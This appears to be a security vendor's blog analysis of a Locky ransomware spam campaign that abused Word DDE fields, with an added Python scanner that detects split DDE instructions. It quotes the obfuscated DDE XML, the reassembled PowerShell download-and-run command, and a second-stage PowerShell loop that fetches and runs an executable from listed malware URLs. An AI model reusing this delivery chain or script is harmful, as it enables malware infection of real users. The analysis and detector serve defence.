The actors behind the Locky Ransomware family have adopted the recent highly publicized Dynamic Data Exchange (DDE) protocol vulnerability to deliver their malware. The DDE technique has been around for some time, but it was recently brought to attention by the people over at SensePost on October 9, 2017. The technique essentially allows for code execution in the context of Microsoft Word without the use of malicious VBA macros.
Other criminals have already started using the DDE technique. The Hancitor malware authors, who often use links to malicious documents in spam emails, adapted their malware documents to use the DDE technique on Monday, October 16. The Hancitor campaign was detailed here.
Today’s campaign used spam emails distributed by the Necurs botnet with the subject “Emailed Invoice – [random digits]” and a Word document attached. The attachment has a filename similar to I_.doc.
The Locky Ransomware actors are known to regularly rotate and innovate through many new and different tactics to deliver their malware. There was no Locky activity on Monday or Tuesday of this week (October 16-17, 2017). We presume they spent that time weaponizing this DDE feature in order to deliver today’s attacks.
Analysis of Malicious Document Delivering Locky Ransomware
The actual DDE code is in the word/document.xml component of the document. This component is a WordprocessingML, or XML Document 2003, file consisting of multiple XML elements. The format of the document.xml file used in this attack is actually quite similar to those used in the Hancitor campaign earlier this week.
The malware authors used an interesting technique, also used in the Hancitor campaign, to obfuscate the malicious commands that download the second and third stages of the attack. The obfuscation makes heavy use of the Rsid (Revision Identifier for Style Definition) class. This is a feature built into OpenXML that allows for effective merging of documents that have forked. As a result, they are able to break up the malicious PowerShell command over several <w:instrText/> elements.
Below you can see a snippet of the actual document.xml file where the malicious code has been embedded. First you can see the DDE command:
<w:r w:rsidR="001E224B">
<w:instrText>DDE</w:instrText>
</w:r>
The PowerShell download and execute routine follows. All of the rsidR attributes have been removed for brevity:
<w:instrText>C:\\Windows\\System32\\</w:instrText>
<w:instrText>cmd</w:instrText>
<w:instrText>.exe</w:instrText>
<w:instrText xml:space="preserve"></w:instrText>
<w:instrText>"</w:instrText>
<w:instrText xml:space="preserve">/k </w:instrText>
<w:instrText xml:space="preserve">powershell </w:instrText>
<w:instrText xml:space="preserve">-NoP -sta -NonI </w:instrText>
<w:instrText>-w hidden</w:instrText>
<w:instrText xml:space="preserve">
</w:instrText>
<w:instrText>$e=</w:instrText>
<w:instrText>(New-Object System.Net.WebClient).DownloadString('</w:instrText>
<w:instrText>http://ryanbaptistchurch.com/KJHDhbje71</w:instrText>
The actual command used when extracted from the multiple instrText elements looks like this:
DDE C:\\Windows\\System32\\cmd.exe "/k -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://ryanbaptistchurch.com/KJHDhbje71'); powershell -e $e"
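Because the field instruction is scattered across many rsid-tagged runs, a string search for "DDE" in document.xml is easy to miss; the fragments have to be joined in document order first. The following is an added example (not code from the original post) that does exactly that: it parses word/document.xml, concatenates every <w:instrText> fragment per paragraph, and flags any field instruction that begins with DDE or DDEAUTO. The sample XML is constructed here to mirror the layout shown above; the rsid values are invented.

```python
import re
import zipfile
from xml.etree import ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# Field instructions that hand control to another application start with DDE or DDEAUTO.
DDE_FIELD = re.compile(r"^\s*(DDE|DDEAUTO)\b", re.IGNORECASE)


def field_instructions(document_xml: bytes) -> list:
    """Return one string per paragraph that carries field instructions, with every
    <w:instrText> fragment joined in document order so that a command split across
    many rsid-tagged runs reads as a single instruction."""
    root = ET.fromstring(document_xml)
    found = []
    for para in root.iter(f"{{{W_NS}}}p"):
        parts = [t.text or "" for t in para.iter(f"{{{W_NS}}}instrText")]
        joined = "".join(parts).strip()
        if joined:
            found.append(joined)
    return found


def find_dde_fields(document_xml: bytes) -> list:
    """Only the reassembled instructions that invoke DDE/DDEAUTO."""
    return [i for i in field_instructions(document_xml) if DDE_FIELD.match(i)]


def scan_docx(path: str) -> list:
    """Read word/document.xml straight out of a .docx (a ZIP container) and scan it."""
    with zipfile.ZipFile(path) as archive:
        return find_dde_fields(archive.read("word/document.xml"))


# Constructed sample: a benign PAGE field, then a DDE field split across runs as in the post.
SAMPLE_DOCUMENT_XML = rb"""<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
 <w:body>
  <w:p><w:r w:rsidR="00111111"><w:instrText xml:space="preserve"> PAGE </w:instrText></w:r></w:p>
  <w:p>
   <w:r w:rsidR="001E224B"><w:instrText>DDE</w:instrText></w:r>
   <w:r w:rsidR="00A11C2F"><w:instrText xml:space="preserve"> </w:instrText></w:r>
   <w:r w:rsidR="003B7D10"><w:instrText>C:\\Windows\\System32\\</w:instrText></w:r>
   <w:r w:rsidR="00C4E901"><w:instrText>cmd</w:instrText></w:r>
   <w:r w:rsidR="00D5F012"><w:instrText>.exe</w:instrText></w:r>
   <w:r w:rsidR="00E60123"><w:instrText xml:space="preserve"> "/k </w:instrText></w:r>
   <w:r w:rsidR="00F71234"><w:instrText xml:space="preserve">powershell </w:instrText></w:r>
   <w:r w:rsidR="00082345"><w:instrText>-NoP -w hidden"</w:instrText></w:r>
  </w:p>
 </w:body>
</w:document>"""

if __name__ == "__main__":
    for instruction in find_dde_fields(SAMPLE_DOCUMENT_XML):
        print("DDE field:", instruction)
```

Joining per paragraph covers the layout in this post; a field can also be spread across paragraphs or nested inside another field, so a production scanner should additionally track <w:fldChar> begin/end markers.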
The above code downloads the second stage of the attack which is a base64 encoded file from:
hxxp://ryanbaptistchurch.com/KJHDhbje71
The contents of that file (after base64 decoding) are a small PowerShell script:
$urls = "http://shamanic-extracts.biz/eurgf837or","http://centralbaptistchurchnj.org/eurgf837or","","http://conxibit.com/eurgf837or"
foreach($url in $urls){
    Try
    {
        Write-Host $url
        $fp = "$env:temp\rekakva32.exe"
        Write-Host $fp
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($url, $fp)
        Start-Process $fp
        break
    }
    Catch
    {
        Write-Host $_.Exception.Message
    }
}
In the above code we can see a basic download and execute routine which downloads the third stage binary. In our analysis we found the third stage to be a PE32 executable, MD5: 4f03e360be488a3811d40c113292bc01. This next stage binary is known as QTLoader, which we will describe in another post.
Please visit our Locky IOC page for a constantly updated feed of Locky Ransomware Indicators of Compromise.